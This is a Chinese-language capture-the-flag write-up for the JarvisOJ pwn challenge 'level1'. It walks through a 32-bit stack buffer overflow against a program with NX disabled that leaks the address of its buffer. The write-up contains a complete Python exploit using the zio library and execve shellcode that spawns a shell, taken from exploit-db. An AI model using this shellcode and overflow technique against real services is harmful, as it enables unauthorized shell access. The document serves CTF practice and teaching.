[JarvisOj](pwn)level1

---

简介 :

地址 : nc pwn2.jarvisoj.com 9877
程序 : level1.80eacdcd51aca92af7749d96efad7fb5

---

分析 :

1. 查看文件类型

   
   Paste_Image.png
2. 在对应的 32 位平台上运行该程序

Tips : sudo apt-get install lib32ncurses5 lib32z1 可以使 64 位 linux 运行 32 位的程序

Paste_Image.png
首先程序会打印 : What's this:0xffe36e40? 然后等待用户输入
这句话后面携带的应该是一个地址
具体是什么还不能确定 , 需要进一步反汇编查看一下

3. 我们来检查一下这个程序的保护机制

Tips : checksec 是 pwntools 工具包的一个工具 , 可以通过安装 pwntools 来使用 , 或者在 github 上找到这个工具单独安装

Paste_Image.png

我们可以发现这里 NX : NX disabled , 说明该程序的栈代码是可以执行的

4. 然后我们来分析该程序的具体逻辑

Paste_Image.png Paste_Image.png

可以看到 , 这里在 vulnerable_function 函数中 , 有一个字符变量
首先打印的是这个字符变量的地址 (首地址)
然后再通过 read 从标准输入流接收用户输入 , 并把输入的数据从 buf 的地址开始写入内存
这样的话 , 我们其实可以想到这样的思路
首先将一段 shellcode 写入 buf , 然后继续往 buf 中写入 , 直到函数的返回地址之前 , 这个时候我们如果想要让我们的 shellcode 被执行 , 就需要让 eip 指向 shellcode 的首地址 , 也就是说 , 我们首先要知道 buf 的首地址 , 这样才能计算出 shellcode 的偏移
然后才能让 eip 跳转到正确的地址
这个程序恰好为我们提供了获取 buf 首地址的方法 , 我们可以通过接收程序输出的第一行数据 , 就可以提取出 buf 的首地址了

Paste_Image.png Paste_Image.png

我们现在来使用 ida 来查看该函数的栈帧 , 用来计算 buf 首地址到 返回地址的偏移
因此我们最终的 payload 应该是这样的 :

distance = 0x88 + 4
shellcode = "" # 之后补充
junk = "A" * (distance - len(shellcode))
address = "" # 程序运行之后才可以得到
payload = shellcode + junk + address

我们现在来完善我们的 python 脚本 :

#!/usr/bin/env python
# encoding:utf-8

import zio

distance = 0x88 + 4
shellcode = "" # 之后补充
junk = "A" * (distance - len(shellcode))

Io = zio.zio("./level1")
# Io = zio.zio(("pwn2.jarvisoj.com", 9877))
line = Io.readline() # 接受到的数据为 : What's this:0xffe36e40?
address = zio.l32(int(line[len("What's this:"):-2], 16)) # 程序运行之后才可以得到
payload = shellcode + junk + address
Io.write(payload)
Io.interact()

现在我们的脚本就差一个 shellcode 了
shellcode 我们一般来说可以通过几种方式获得 :

1. 用汇编自己实现 shellcode , 这种方法的好处是 , 可定制性较高 , 但是难度大 , 对汇编语言的功底要求较为深厚

2. 利用搜索引擎检索别人写好的可以直接来用的 shellcode
3. https://coding.net/u/yihangwang/p/shellcode_spider/git , 一个 python 写的 shellcode 爬虫 , 爬取 exploit-db 上的所有 shellcode 以及详细描述 , 以备不时之需

我们这里直接使用 exploit-db 上的一个 shellcode

# 可以打开一个 shell
shellcode = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"

现在我们的代码就变成了这样 :

#!/usr/bin/env python
# encoding:utf-8

import zio

distance = 0x88 + 4
shellcode = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34";
junk = "A" * (distance - len(shellcode))

Io = zio.zio("./level1")
# Io = zio.zio(("pwn2.jarvisoj.com", 9877))
line = Io.readline() # 接受到的数据为 : What's this:0xffe36e40?
address = zio.l32(int(line[len("What's this:"):-2], 16)) # 程序运行之后才可以得到
payload = shellcode + junk + address
Io.write(payload)
Io.interact()

测试一下 :

Paste_Image.png

成功溢出 , 现在就愉快地 pwn 掉服务器吧

Paste_Image.png